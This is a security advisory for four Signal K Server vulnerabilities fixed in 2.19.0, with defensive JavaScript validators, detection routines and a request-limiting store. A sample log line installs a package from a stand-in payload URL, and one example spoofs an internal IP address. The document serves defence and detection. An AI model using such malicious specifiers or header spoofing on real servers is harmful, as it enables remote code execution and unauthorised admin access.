Affected Product
Signal K Server – Marine data server commonly used as a central hub on boats for navigation, sensors, and integrations.
Affected Versions: All versions prior to 2.19.0
Fixed Version: 2.19.0
CVE-2025-68619 – Arbitrary Code Execution via npm Package Installation
Overview
- CVE ID: CVE-2025-68619
- CVSS v3.1 Score: 8.8
- Severity: High
- Attack Vector: Network
- Privileges Required: Admin
- User Interaction: None
- Exploitability: High
- Exploit Availability: Practical and easy for attackers with administrative access
Description
Signal K Server allows administrators to install plugins and web applications using an App Store REST API. Although the server verifies that the supplied package name exists in the npm registry, it does not properly validate or restrict the version parameter.
npm allows highly flexible version syntax, including Git repositories, GitHub shorthand notation, and remote tarballs served over HTTP or HTTPS. Signal K Server passes the version value directly to npm without sanitization.
When npm installs a package, it automatically executes lifecycle scripts such as postinstall. If a malicious package is installed, its post-installation script executes with the privileges of the Signal K Server process, resulting in arbitrary code execution on the host system.
Exploitation Scenario
An attacker with administrative access submits an API request to install a legitimate npm package name but supplies a malicious version specifier that references an attacker-controlled source. npm retrieves and installs the package, executing the malicious postinstall script and allowing full command execution on the system.
Impact
- Full compromise of the Signal K Server
- Installation of backdoors or persistence mechanisms
- Unauthorized access to connected onboard systems
- Potential data exfiltration or system manipulation
MITRE ATT&CK Mapping
- T1190 – Exploit Public-Facing Application
- T1059 – Command and Scripting Interpreter
- T1105 – Ingress Tool Transfer
- T1068 – Exploitation for Privilege Escalation
Detection Guidance
Indicators
- Plugin installations referencing URLs, Git repositories, or non-standard version strings
- Execution of shell commands during plugin installation
- Unexpected outbound network traffic during install operations
Relevant Log Sources
- Signal K application logs
- npm debug and installation logs
- Host-based process execution logs
- Network egress monitoring logs
Detection Rule Concepts
- Alert on npm install commands that include URL-based or Git-based version specifiers
- Monitor for execution of postinstall scripts during plugin installations
- Detect outbound connections initiated during application plugin installation events
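The validation gap in the Description and the detection rule concepts above reduce to one question: does the version specifier resolve against the npm registry, or does it point npm at a Git repository, a URL or a local path? The following is an added JavaScript example, not Signal K Server's own code or its 2.19.0 patch. The function names (`classifyVersionSpec`, `buildInstallArgs`, `flagSuspiciousInstalls`), the "npm install name@spec" log line shape and the sample lines are constructed for illustration; the specifier forms it recognises are the ones npm itself accepts.

```javascript
// Added example, not Signal K Server code: classify an npm version specifier
// and flag the kinds (Git, URL, GitHub shorthand, local path) that npm would
// fetch from outside the registry. One check serves both as an allow-list in
// an install handler and as a detection rule over install logs.

const GIT_SCHEMES = /^(git\+ssh|git\+https?|git\+file|git|ssh):\/\//i;
const HOSTED_SHORTHAND = /^(github|gitlab|bitbucket|gist):/i;
// "user/repo" or "user/repo#ref": GitHub shorthand with no prefix at all.
const GITHUB_BARE = /^[A-Za-z0-9_.-]+\/[A-Za-z0-9_.-]+(#.*)?$/;
const HTTP_URL = /^https?:\/\//i;
const LOCAL_PATH = /^(file:|\.\.?\/|\/|~\/)/;
// Exact semantic version, optionally prefixed by ^ or ~, with optional
// pre-release and build metadata (semver.org grammar, simplified).
const SEMVER = /^[\^~]?v?\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

function classifyVersionSpec(spec) {
  const s = String(spec).trim();
  if (s === '') return 'empty';
  if (GIT_SCHEMES.test(s) || HOSTED_SHORTHAND.test(s) || GITHUB_BARE.test(s)) return 'git';
  if (HTTP_URL.test(s)) return 'url';
  if (LOCAL_PATH.test(s)) return 'file';
  if (/^npm:/i.test(s)) return 'alias';
  if (SEMVER.test(s)) return 'semver';
  return 'other'; // dist-tags such as "latest", complex ranges, anything unrecognised
}

// Hardened handler in the spirit of the fix described above: the package name
// is assumed to have passed the existing registry check; the version must also
// be a plain semver specifier before anything is handed to npm.
function buildInstallArgs(name, version) {
  const kind = classifyVersionSpec(version);
  if (kind !== 'semver') {
    throw new Error(`rejected version spec for ${name}: ${kind} (${version})`);
  }
  return ['install', `${name}@${String(version).trim()}`];
}

// Detection: scan lines that record an npm install (for example a host
// process-execution log) and return entries whose spec leaves the registry.
const INSTALL_RE = /npm\s+(?:install|i|add)\s+(\S+)/;

function flagSuspiciousInstalls(lines) {
  const hits = [];
  for (const line of lines) {
    const m = INSTALL_RE.exec(line);
    if (!m) continue;
    const target = m[1];
    // Split "name@spec"; a leading "@" belongs to a scoped package name.
    const at = target.indexOf('@', 1);
    const spec = at === -1 ? '' : target.slice(at + 1);
    const kind = classifyVersionSpec(spec);
    if (kind === 'git' || kind === 'url' || kind === 'file') {
      hits.push({ line, target, kind });
    }
  }
  return hits;
}

// Constructed sample log lines for a stand-alone run; not real log output.
const SAMPLE_LOG = [
  'npm install signalk-example-plugin@1.4.2',
  'npm install signalk-example-plugin@https://example.invalid/payload.tgz',
  'npm install signalk-example-plugin@github:someuser/somerepo#main',
  'npm install @signalk/example-app@^2.0.0',
];

console.log(flagSuspiciousInstalls(SAMPLE_LOG));
```

Running npm with `--ignore-scripts` would also stop the postinstall step from executing, but it is a blunt instrument (it skips scripts that some legitimate packages need to build) and does not replace rejecting the specifier itself, since an attacker-controlled package can still ship malicious code that runs when the plugin is loaded.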
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Signal K Server 2.19.0 validates the npm version parameter strictly: only semantic-version specifiers are accepted, and Git, URL and other external version sources are rejected before anything is passed to npm.
CVE-2025-68273 – Unauthenticated Information Disclosure
Overview
- CVE ID: CVE-2025-68273
- CVSS v3.1 Score: 6.5
- Severity: Medium
- Attack Vector: Network
- Authentication Required: None
- Exploitability: High
- Exploit Availability: Easy
Description
Signal K Server exposes internal API endpoints that return sensitive system information without requiring authentication. Any remote user can retrieve detailed internal data related to the server configuration and connected components.
Exposed information includes the complete Signal K data schema, connected serial and navigation devices, and installed analysis or diagnostic tools. This information can be used to map the environment and prepare targeted attacks.
Exploitation Scenario
An attacker sends unauthenticated requests to exposed endpoints and receives detailed internal system information. The attacker uses this data to impersonate devices, craft convincing access requests, or identify attack paths.
Impact
- Exposure of sensitive system configuration details
- Enables reconnaissance for further attacks
- Increased likelihood of successful social engineering or privilege escalation
MITRE ATT&CK Mapping
- T1592 – Gather Victim Host Information
- T1590 – Gather Victim Network Information
Detection Guidance
Indicators
- Anonymous access to internal API endpoints
- Enumeration-style request patterns
Relevant Log Sources
- Web server access logs
- Application request logs
- API gateway or reverse proxy logs
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 enforces authentication on previously exposed endpoints.
CVE-2025-69203 – Social Engineering-Assisted Privilege Escalation
Overview
- CVE ID: CVE-2025-69203
- CVSS v3.1 Score: 8.1
- Severity: High
- Attack Vector: Network
- Authentication Required: No initial authentication
- Exploitability: High
- Exploit Availability: Practical
Description
This vulnerability arises from multiple design weaknesses in the access request system that can be combined to mislead administrators into granting elevated permissions.
The administrator interface prominently displays the request description but makes the requested permission level less visible. Attackers can request administrative access while providing a description that suggests limited or read-only functionality.
Additionally, the system trusts the X-Forwarded-For HTTP header without checking that the request actually arrived through a reverse proxy. A remote attacker can therefore set the source address recorded for an access request to any value, including an onboard private address. Combined with the ability to enumerate device names, attackers can convincingly impersonate legitimate onboard devices.
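The header-trust problem and the misleading-description problem are both visible in code. Below is an added JavaScript example, not Signal K Server's own code: `clientIpWeak` reproduces the behaviour described above (the header wins whenever present), `clientIpHardened` only honours X-Forwarded-For when the TCP peer is a configured reverse proxy, and `triageAccessRequest` applies both indicators an administrator would want surfaced. The trusted-proxy list, the permission level names (`admin`, `readonly`) and the request shape are assumptions made for the example.

```javascript
// Added example, not Signal K Server code: deriving the client address behind
// an access request, and triaging the request before it reaches the approver.

// Reverse proxies whose X-Forwarded-For we accept; assumed configuration value.
const TRUSTED_PROXIES = new Set(['127.0.0.1', '::1']);

function looksLikeIp(s) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(s) ||
    (/^[0-9a-f:]+(\.\d{1,3}){0,3}$/i.test(s) && s.includes(':'));
}

// RFC 1918 and loopback ranges an attacker would want to claim (IPv4 only here).
function isInternalIPv4(ip) {
  const m = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(ip);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || a === 127 || (a === 192 && b === 168) || (a === 172 && b >= 16 && b <= 31);
}

// Vulnerable behaviour as described above: any client can set the header and
// the leftmost address is displayed as the request's origin.
function clientIpWeak(remoteAddress, xff) {
  if (xff) return xff.split(',')[0].trim();
  return remoteAddress;
}

// Hardened: ignore the header unless the TCP peer is a trusted proxy. Then walk
// the chain from the right, skipping trusted proxy hops; the first remaining
// address is the one the outermost proxy actually saw. Anything the client
// prepended sits further left and is never reached.
function clientIpHardened(remoteAddress, xff, trusted = TRUSTED_PROXIES) {
  if (!trusted.has(remoteAddress) || !xff) return remoteAddress;
  const chain = xff.split(',').map(s => s.trim()).filter(looksLikeIp);
  for (let i = chain.length - 1; i >= 0; i--) {
    if (!trusted.has(chain[i])) return chain[i];
  }
  return remoteAddress; // every hop was a trusted proxy
}

// Words that suggest limited access; a description using them while requesting
// admin is exactly the mismatch the Detection Guidance below calls out.
const READ_ONLY_WORDS = /\b(read[- ]?only|view|display|monitor)\b/i;

function triageAccessRequest(req) {
  const warnings = [];
  if (req.permissions === 'admin' && READ_ONLY_WORDS.test(req.description)) {
    warnings.push('permission_mismatch');
  }
  const claimed = clientIpWeak(req.remoteAddress, req.xff);
  const actual = clientIpHardened(req.remoteAddress, req.xff);
  if (claimed !== actual && isInternalIPv4(claimed)) {
    warnings.push('spoofed_internal_ip');
  }
  // Permission level is returned first so a UI built on this puts it front and centre.
  return { permissions: req.permissions, actual, warnings };
}

// Constructed request: external peer, spoofed onboard address, benign wording.
console.log(triageAccessRequest({
  description: 'Read-only display for the cockpit',
  permissions: 'admin',
  remoteAddress: '203.0.113.7',
  xff: '192.168.1.20',
}));
```

The rightmost-untrusted walk matters because a proxy appends the peer address it saw; a client-supplied header value ends up to the left of that entry, so reading the leftmost address (as `clientIpWeak` does) always favours the attacker.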
Exploitation Scenario
An attacker enumerates existing device names, submits an access request impersonating a trusted device, requests administrative permissions, provides a benign description, and spoofs an internal IP address. The administrator approves the request based on misleading information, granting full administrative access.
Impact
- Unauthorized administrative access
- Full control of Signal K Server
- Potential compromise of connected systems
MITRE ATT&CK Mapping
- T1078 – Valid Accounts
- T1566 – Phishing / Social Engineering
- T1036 – Masquerading
Detection Guidance
Indicators
- Access requests with descriptions that do not align with requested permissions
- Requests showing internal IP addresses from external sources
- Sudden approval of high-privilege access for new or unknown devices
Relevant Log Sources
- Access request and approval logs
- Authentication and authorization logs
- Reverse proxy and network logs
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 improves permission visibility, validates forwarded IP headers, and hardens access request handling.
CVE-2025-68272 – Unauthenticated Denial of Service
Overview
- CVE ID: CVE-2025-68272
- CVSS v3.1 Score: 7.5
- Severity: High
- Attack Vector: Network
- Authentication Required: None
- Exploitability: Very High
- Exploit Availability: Trivial
Description
The access request endpoint stores incoming requests entirely in memory without rate limiting or size restrictions. An attacker can send a large number of requests and cause unbounded memory consumption.
This leads to JavaScript heap exhaustion and crashes the Signal K Server process.
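The unbounded in-memory store described above is fixed by bounding three things the attacker controls: the total number of pending requests, the number per source address, and the size of each free-text field. The following is an added JavaScript example, not Signal K Server's own code or its 2.19.0 patch; the `AccessRequestStore` class, the limit values and the request fields are assumptions made for the example.

```javascript
// Added example, not Signal K Server code: a pending access-request store that
// cannot grow without bound, plus a simulated flood showing the limits hold.

// Limit values are assumed for the example; tune to the deployment.
const LIMITS = { maxPending: 100, maxPerSource: 3, maxFieldLength: 256 };

class AccessRequestStore {
  constructor(limits = LIMITS) {
    this.limits = limits;
    this.pending = new Map();   // requestId -> request
    this.perSource = new Map(); // source ip -> number of pending requests
    this.nextId = 1;
  }

  // Returns { ok: true, id } or { ok: false, reason }; never throws on
  // attacker-controlled input and never stores an oversized field.
  submit({ clientId, description, permissions, sourceIp }) {
    const { maxPending, maxPerSource, maxFieldLength } = this.limits;
    if (typeof clientId !== 'string' || typeof description !== 'string') {
      return { ok: false, reason: 'invalid' };
    }
    if (clientId.length > maxFieldLength || description.length > maxFieldLength) {
      return { ok: false, reason: 'too_large' };
    }
    if (this.pending.size >= maxPending) return { ok: false, reason: 'store_full' };
    const n = this.perSource.get(sourceIp) || 0;
    if (n >= maxPerSource) return { ok: false, reason: 'rate_limited' };

    const id = String(this.nextId++);
    this.pending.set(id, { id, clientId, description, permissions, sourceIp, createdAt: Date.now() });
    this.perSource.set(sourceIp, n + 1);
    return { ok: true, id };
  }

  // Approve or deny: removes the entry and releases the per-source slot.
  resolve(id) {
    const req = this.pending.get(id);
    if (!req) return false;
    this.pending.delete(id);
    const n = this.perSource.get(req.sourceIp) || 0;
    if (n <= 1) this.perSource.delete(req.sourceIp);
    else this.perSource.set(req.sourceIp, n - 1);
    return true;
  }

  size() { return this.pending.size; }
}

// Flood from one source, as in the exploitation scenario. After maxPerSource
// accepted requests every further attempt is refused, so memory stays flat no
// matter how many requests arrive.
function simulateFlood(store, sourceIp, attempts) {
  const outcome = { accepted: 0, rejected: {} };
  for (let i = 0; i < attempts; i++) {
    const r = store.submit({ clientId: `dev-${i}`, description: 'x', permissions: 'admin', sourceIp });
    if (r.ok) outcome.accepted++;
    else outcome.rejected[r.reason] = (outcome.rejected[r.reason] || 0) + 1;
  }
  return outcome;
}

const demo = new AccessRequestStore();
console.log(simulateFlood(demo, '203.0.113.7', 10000), 'pending:', demo.size());
```

The per-source cap alone is not enough against an attacker with many addresses, which is why the total cap exists; the total cap alone would let one source lock legitimate devices out, which is why the per-source cap exists. Rejected requests should still be counted and logged, since a burst of `rate_limited` or `store_full` outcomes is the detection signal for this attack.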
Exploitation Scenario
An attacker floods the access request endpoint with repeated requests until the server exhausts available memory and crashes.
Impact
- Complete service outage
- Loss of availability for navigation and data services
- Potential safety risks in marine environments
MITRE ATT&CK Mapping
- T1499 – Endpoint Denial of Service
Detection Guidance
Indicators
- High request volume to /signalk/v1/access/requests
- Rapid memory consumption
- Application crashes or restarts
Relevant Log Sources
- Web server logs
- Application crash and error logs
- System memory and performance metrics
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 adds request limits and improves memory management.
Final Recommendation
All listed vulnerabilities are fully addressed in Signal K Server version 2.19.0. Immediate upgrade is strongly recommended, especially for systems exposed to external networks or used in safety-critical marine environments.
